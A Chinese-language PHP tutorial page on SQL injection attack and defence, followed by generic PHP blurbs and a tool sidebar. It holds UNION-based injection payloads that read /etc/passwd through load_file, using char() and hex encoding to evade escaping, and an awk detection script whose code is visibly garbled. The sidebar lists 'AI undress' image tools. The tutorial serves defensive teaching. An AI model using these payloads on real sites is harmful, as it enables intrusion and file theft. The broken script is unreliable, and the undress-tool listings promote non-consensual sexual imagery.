WebjxCom提示:程式設計師寫程式碼的時候講究TDD(測試驅動開發):在實作一個功能前,會先寫一個測試案例,然後再寫程式碼使其運作通過。其實當駭客SQL Injection時,同樣是一個TDD的過程:他們會先嘗試讓程式報錯,然後一點一點的修正參數內容,當程式再次運作成功之時,注入也就隨之 |
程式設計師寫程式碼的時候講究TDD(測試驅動開發):在實作一個功能前,會先寫一個測試案例,然後再寫程式碼使之運作通過。其實當駭客SQL Injection時,同樣是一個TDD的過程:他們會先嘗試讓程式報錯,然後一點一點的修正參數內容,當程式再次運作成功之時,注入也就隨之成功了。
進攻:
假設你的程式裡有類似下面內容的腳本:
$sql = "SELECT id, title, content FROM articles WHERE id = {$_GET[''id'']}";
正常訪問時其URL如下:
/articles.php?id=123
當駭客想判斷是否有SQL Injection漏洞時,最常用的方式就是在整形ID後面加個單引號:
/articles.php?id=123''
由於我們沒有過濾$_GET[''id'']參數,所以必然會報錯,可能會是類似下面的資訊:
supplied argument is not a valid MySQL result resource in ...
這些資訊就足以說明腳本存在漏洞了,我們可以再耍點手段:
/articles.php?id=0 union select 1,2,3
之所以select 1,2,3是因為union要求兩邊的字段數一致,前面是id, title,content三個字段,後面1,2,3也是三個,所以不會報語法錯誤,還有設定id=0是一條不存在的記錄,那麼查詢的結果就是1,2,3,反映到網頁上,原本顯示id的地方會顯示1,顯示title的地方會顯示2,顯示content的地方會顯示3。
到如何繼續利用,也要看magic_quotes_gpc的設定:
當magic_quotes_gpc為off時:
/articles.php?id=0 union select 1,2,load_file(''/etc/passwd'')
一來,/etc/passwd檔案的內容就會顯示在原本顯示content的地方。
當magic_quotes_gpc為on時:
此時如果直接使用load_file(''/etc/passwd'')就無效了,因為單引號被轉義了,但是還有辦法:
/articles.php?id =0 union select 1,2,load_file(char(47,101,116,99,47,112,97,115,115,119,100))
其中的數字就是除字串此以為,也可以使用字串的十六進位:字串每個字元循環輸出dechex(ord(...))
/articles.php?id=0 union select 1,2,load_file(0x2f6574632f706173737764)
這裡僅僅說了數字型參數的幾種攻擊手段,屬於冰山一角,字串型參數等攻擊手段看後面的文檔連結。
防禦:
網路上有一些類似SQL Injection Firewall的軟體可供使用,比如說GreenSQL,如果網站已經開始遭受SQL Injection攻擊,那麼使用這樣的快捷工具往往會救你一命,不過這樣的軟體在架構上屬於一個Proxy的角色,多半會影響網站並發效能,所以在選擇與否這個問題上最好視客觀條件來慎重決定。很多時候專業的軟體並不是必須的,還有很多輕量級解決方案,以下示範如何使用awk來偵測可能的漏洞。
建立detect_sql_injection.awk腳本,內容如下(如果要拷貝一下內容的話記得不要包含行號):
01 #!/bin/gawk -f
02
03 /$_(GET|POST|COOKIE|REQUEST)s *[/ {
04 IGNORECASE = 1
05 if (match($0, /$.*(sql|query)/)) {
06
08 next
09 }
10 }
11
12 function output()
13 {
14 $1 = $1
15 print "CRUD: " $0 "nFILE: " FILENAME "nLINE: " FNRNR "print "CRUD: " $0 "nFILE: " FILENAME "nLINE: " FNRNR " print "CRUD: " $0 "nFILE: " FILENAME "nLINE: " FNRNR "n"可符合此腳本的問題,想要擴展匹配模式也容易,只要照貓畫虎寫if match語句即可。
1:$sql = "SELECT * FROM users WHERE username = ''{$_POST[''username'']}''";
2:$res = mysql_query("SELECT * FROM users WHERE username = ''{ $_POST[''username'']}''");
使用前別忘了先chmod +x detect_sql_injection.awk,有兩種呼叫方法:
1:./detect_sql_injection.awk /path/to/php/ script/file
2:find /path/to/php/script/directory -name "*.php" | xargs ./detect_sql_injection.awk
會把有問題的程式碼資訊顯示出來,樣子如下:
CRUD: $sql = "SELECT * FROM users WHERE username = ''{$_POST[''username'']}''";
FILE: /path/to/file.php
LINE: 123
現實環境中有很多應用這個腳本的方法,比如說透過CRON定期掃描程式原始文件,或是在SVN提交時透過鉤子方法自動匹配。
使用專業工具也好,檢測腳本亦罷,都是被動的防守,問題的根本始終取決於在程式設計師頭腦裡是否有必要的安全意識,以下是一些必須要牢記的準則:
1:數字型參數使用類似intval,floatval這樣的方法強制過濾。
2:字串型參數使用類似mysql_real_escape_string這樣的方法強制過濾,而不是簡單的addslashes。
3:最好拋棄mysql_query這樣的拼接SQL查詢方式,盡量使用PDO的prepare綁定方式。
4:使用rewrite技術隱藏真實腳本及參數的訊息,透過rewrite正規也能過濾可疑的參數。
5:關閉錯誤提示,不給攻擊者敏感資訊:display_errors=off。
6:以日誌的方式記錄錯誤訊息:log_errors= />7:不要用具有FILE權限的帳號(例如root)連接MySQL,這樣就屏蔽了load_file等危險函數。
8:......
網站安全其實並不複雜,總結出來就是一句話:過濾輸入,轉義輸出。其中,我們上面一直討論的SQL Injection問題就屬於過濾輸入問題,至於轉義輸出問題,其代表是Cross-site scripting,但它不屬於本文的範疇,就不多說了。
文件:
addslashes() Versus mysql_real_escape_string()
SQL Injection with MySQL
Advanced SQL Injection with MySQL
MySQL注入中導出欄位內容的研究—透過注入導出WebShell com/Cont-328.html
以上就介紹了HP+MYSQL網站SQL Injection攻防,包含了方面的內容,希望對PHP教學有興趣的朋友有幫助。

PHP在電子商務、內容管理系統和API開發中廣泛應用。 1)電子商務:用於購物車功能和支付處理。 2)內容管理系統:用於動態內容生成和用戶管理。 3)API開發:用於RESTfulAPI開發和API安全性。通過性能優化和最佳實踐,PHP應用的效率和可維護性得以提升。

PHP可以輕鬆創建互動網頁內容。 1)通過嵌入HTML動態生成內容,根據用戶輸入或數據庫數據實時展示。 2)處理表單提交並生成動態輸出,確保使用htmlspecialchars防XSS。 3)結合MySQL創建用戶註冊系統,使用password_hash和預處理語句增強安全性。掌握這些技巧將提升Web開發效率。

PHP和Python各有優勢,選擇依據項目需求。 1.PHP適合web開發,尤其快速開發和維護網站。 2.Python適用於數據科學、機器學習和人工智能,語法簡潔,適合初學者。

PHP仍然具有活力,其在現代編程領域中依然佔據重要地位。 1)PHP的簡單易學和強大社區支持使其在Web開發中廣泛應用;2)其靈活性和穩定性使其在處理Web表單、數據庫操作和文件處理等方面表現出色;3)PHP不斷進化和優化,適用於初學者和經驗豐富的開發者。

PHP在現代Web開發中仍然重要,尤其在內容管理和電子商務平台。 1)PHP擁有豐富的生態系統和強大框架支持,如Laravel和Symfony。 2)性能優化可通過OPcache和Nginx實現。 3)PHP8.0引入JIT編譯器,提升性能。 4)雲原生應用通過Docker和Kubernetes部署,提高靈活性和可擴展性。

PHP適合web開發,特別是在快速開發和處理動態內容方面表現出色,但不擅長數據科學和企業級應用。與Python相比,PHP在web開發中更具優勢,但在數據科學領域不如Python;與Java相比,PHP在企業級應用中表現較差,但在web開發中更靈活;與JavaScript相比,PHP在後端開發中更簡潔,但在前端開發中不如JavaScript。

PHP和Python各有優勢,適合不同場景。 1.PHP適用於web開發,提供內置web服務器和豐富函數庫。 2.Python適合數據科學和機器學習,語法簡潔且有強大標準庫。選擇時應根據項目需求決定。

PHP是一種廣泛應用於服務器端的腳本語言,特別適合web開發。 1.PHP可以嵌入HTML,處理HTTP請求和響應,支持多種數據庫。 2.PHP用於生成動態網頁內容,處理表單數據,訪問數據庫等,具有強大的社區支持和開源資源。 3.PHP是解釋型語言,執行過程包括詞法分析、語法分析、編譯和執行。 4.PHP可以與MySQL結合用於用戶註冊系統等高級應用。 5.調試PHP時,可使用error_reporting()和var_dump()等函數。 6.優化PHP代碼可通過緩存機制、優化數據庫查詢和使用內置函數。 7


熱AI工具

Undresser.AI Undress
人工智慧驅動的應用程序,用於創建逼真的裸體照片

AI Clothes Remover
用於從照片中去除衣服的線上人工智慧工具。

Undress AI Tool
免費脫衣圖片

Clothoff.io
AI脫衣器

AI Hentai Generator
免費產生 AI 無盡。

熱門文章

熱工具

MantisBT
Mantis是一個易於部署的基於Web的缺陷追蹤工具,用於幫助產品缺陷追蹤。它需要PHP、MySQL和一個Web伺服器。請查看我們的演示和託管服務。

Atom編輯器mac版下載
最受歡迎的的開源編輯器

SublimeText3 Linux新版
SublimeText3 Linux最新版

DVWA
Damn Vulnerable Web App (DVWA) 是一個PHP/MySQL的Web應用程序,非常容易受到攻擊。它的主要目標是成為安全專業人員在合法環境中測試自己的技能和工具的輔助工具,幫助Web開發人員更好地理解保護網路應用程式的過程,並幫助教師/學生在課堂環境中教授/學習Web應用程式安全性。 DVWA的目標是透過簡單直接的介面練習一些最常見的Web漏洞,難度各不相同。請注意,該軟體中

mPDF
mPDF是一個PHP庫,可以從UTF-8編碼的HTML產生PDF檔案。原作者Ian Back編寫mPDF以從他的網站上「即時」輸出PDF文件,並處理不同的語言。與原始腳本如HTML2FPDF相比,它的速度較慢,並且在使用Unicode字體時產生的檔案較大,但支援CSS樣式等,並進行了大量增強。支援幾乎所有語言,包括RTL(阿拉伯語和希伯來語)和CJK(中日韓)。支援嵌套的區塊級元素(如P、DIV),